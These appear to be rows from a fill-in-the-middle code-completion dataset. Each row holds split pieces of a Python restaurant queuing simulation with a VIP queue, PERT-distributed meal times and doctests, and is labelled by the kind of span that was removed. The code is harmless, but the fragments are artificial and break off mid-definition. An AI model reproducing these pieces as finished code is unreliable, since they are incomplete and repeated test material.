total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # all group have their unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Deal with the situation that several groups arrive at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client()
| self.groups.insert(1, group) | conditional_block |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The amount of number to generate, default value is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
|
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generating the data for groups, and run the simulation
:param Duration: Total length of time the simulation would run
:param amount: Estimated number of groups would come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Generate vip situation, based on the probability of 8%
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # all group have their unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Deal with the situation that several groups arrive at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client()
| """
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp | identifier_body |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The amount of number to generate, default value is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def | (self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generating the data for groups, and run the simulation
:param Duration: Total length of time the simulation would run
:param amount: Estimated number of groups would come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Generate vip situation, based on the probability of 8%
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # all group have their unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Deal with the situation that several groups arrive at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client()
| add_queue | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.